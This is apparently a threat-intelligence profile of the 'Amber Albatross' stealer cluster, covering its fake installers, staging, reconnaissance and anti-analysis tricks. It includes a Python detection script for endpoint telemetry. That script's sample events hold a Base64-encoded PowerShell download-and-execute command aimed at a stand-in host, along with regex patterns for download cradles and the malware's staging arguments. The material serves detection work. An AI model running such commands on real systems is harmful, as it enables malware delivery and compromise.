
Amber Albatross

Amber Albatross is Red Canary’s name for a stealer-like activity cluster delivered via installers masquerading as legitimate free software, often PDF-themed utilities, and associated with potentially unwanted programs including PC App Store and, to a lesser extent in 2025, Bit Guardian’s Win Riser. Red Canary describes the installers as code-signed but using rotating signer identities and changing utility names, with the chains leading to the same Pyarmor-protected final payload. The intrusion chain progresses through multiple stages and culminates in a PyInstaller executable with stealer capabilities. In 2025, operators updated later-stage tradecraft by adding Base64-encoded PowerShell commands to download and execute subsequent payloads and by migrating some second- and third-stage components from C++ to Go. One observed PDFast lure dropped upd.exe, which then used Base64-encoded PowerShell for retrieval and execution of later stages. Regardless of the initial delivery path, the final payload was a PyInstaller file.

The final-stage malware performs reconnaissance consistent with stealer behavior. Reported actions include WMIC-based hypervisor detection; enumeration of system manufacturer, model, and installed Windows updates; checks for antivirus and firewall products; discovery of browsers including Edge, Firefox, Chrome, Chromium, Avast Browser, and Brave; and attempts to access browser profile or user data directories. For Chrome, it checks HKLM:\SOFTWARE\Policies\Google\Chrome\CloudManagementEnrollmentToken to determine whether the browser may be managed by corporate policy, although the downstream use of that information is not determined in the source content. Some 2025 variants also queried uninstall registry keys to compile installed software and version information.

Amber Albatross incorporates anti-analysis and anti-sandbox measures. The downloaded installer and PyInstaller payload required specific command-line arguments to fully execute, consistently including --safetorun and --channel=<hex numbers>, which hindered behavioral analysis platforms from reliably exposing the last-stage payload. Red Canary also observed that the PC App Store installer behaved differently in sandboxes than in live telemetry, indicating anti-sandbox logic in the initial installer. The final-stage Python payload was protected with Pyarmor, encrypting and obfuscating Python bytecode and complicating static analysis.
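The behaviours described in the two preceding paragraphs (the --safetorun/--channel=&lt;hex&gt; staging arguments, Base64-encoded PowerShell used to fetch later stages, WMIC manufacturer/model enumeration, and the Chrome CloudManagementEnrollmentToken policy check) can be turned into endpoint detection logic. The script below is an added example written for this page; it is not code from Red Canary or from Mallory, and the process-creation events it scans are constructed for illustration (the installer name, the --channel hex value, the URL and the file names are made up). It assumes telemetry has already been normalised into a list of dicts with parent, image and cmdline fields, which is the only shape it understands.

```python
import base64
import re


def _encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64).
    Used here only to build the constructed sample event below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events. They mirror the chain described on
# the page but are not real telemetry; every value here is made up for the example.
SAMPLE_EVENTS = [
    # Stage 2: dropped binary launched with the anti-sandbox arguments
    {"parent": "PDFast-setup.exe", "image": "upd.exe",
     "cmdline": "upd.exe --safetorun --channel=3fa9c1b2"},
    # Stage 2 -> 3: Base64-encoded PowerShell that downloads and runs the next stage
    {"parent": "upd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + _encode_powershell(
                    "Invoke-WebRequest -Uri http://example.invalid/s3.bin "
                    "-OutFile $env:TEMP\\s3.exe; Start-Process $env:TEMP\\s3.exe")},
    # Final stage: manufacturer/model enumeration via WMIC (a common hypervisor check)
    {"parent": "s3.exe", "image": "wmic.exe",
     "cmdline": "wmic computersystem get manufacturer,model"},
    # Final stage: is Chrome enrolled in cloud management?
    {"parent": "s3.exe", "image": "reg.exe",
     "cmdline": "reg query HKLM\\SOFTWARE\\Policies\\Google\\Chrome "
                "/v CloudManagementEnrollmentToken"},
    # Benign administrative PowerShell that must not fire
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service -Name Spooler"},
]

# -EncodedCommand and its short aliases, followed by a Base64 blob
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-and-execute primitives worth flagging inside a decoded script
CRADLE = re.compile(r"\b(?:invoke-webrequest|iwr|downloadstring|downloadfile|net\.webclient"
                    r"|start-process|invoke-expression|iex)\b", re.I)
STAGING_CHANNEL = re.compile(r"--channel=[0-9a-f]+", re.I)
WMIC_SYSINFO = re.compile(r"computersystem\s+get\s+.*(?:manufacturer|model)", re.I)
CHROME_MGMT_KEY = re.compile(r"policies\\google\\chrome.*cloudmanagementenrollmenttoken", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE, so not an encoded command


def scan_events(events):
    """Return (event_index, rule_name, detail) for every event matching a rule."""
    findings = []
    for i, ev in enumerate(events):
        cmd = ev["cmdline"]
        image = ev["image"].lower()
        # Rule 1: staging binary launched with the arguments that gate full execution
        if "--safetorun" in cmd.lower() and STAGING_CHANNEL.search(cmd):
            findings.append((i, "staging_args", "launched with --safetorun and --channel=<hex>"))
        # Rule 2: encoded PowerShell whose decoded body contains a download cradle
        if image == "powershell.exe":
            script = decode_encoded_command(cmd)
            if script and CRADLE.search(script):
                findings.append((i, "encoded_download_cradle", script))
        # Rule 3: WMIC manufacturer/model query used for hypervisor detection
        if image == "wmic.exe" and WMIC_SYSINFO.search(cmd):
            findings.append((i, "system_model_recon", cmd))
        # Rule 4: check of the Chrome cloud-management enrollment policy key
        if CHROME_MGMT_KEY.search(cmd):
            findings.append((i, "chrome_management_check", cmd))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

Each rule is intentionally narrow (the staging rule needs both arguments, and the PowerShell rule fires only when the decoded body contains a download or execution primitive) so that ordinary administrative PowerShell, like the last sample event, is not flagged. Decoding the encoded command rather than matching on the Base64 string is what keeps the rule stable across the rotating hex values and payload URLs described above.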

Red Canary tracked Amber Albatross as a prevalent threat in 2025, ranking it first in April 2025 and second in July 2025, and also described it in first-half 2025 reporting as one of several internally named “color bird” threat clusters. The content does not attribute Amber Albatross to a named external threat actor, industry vertical, or geography.
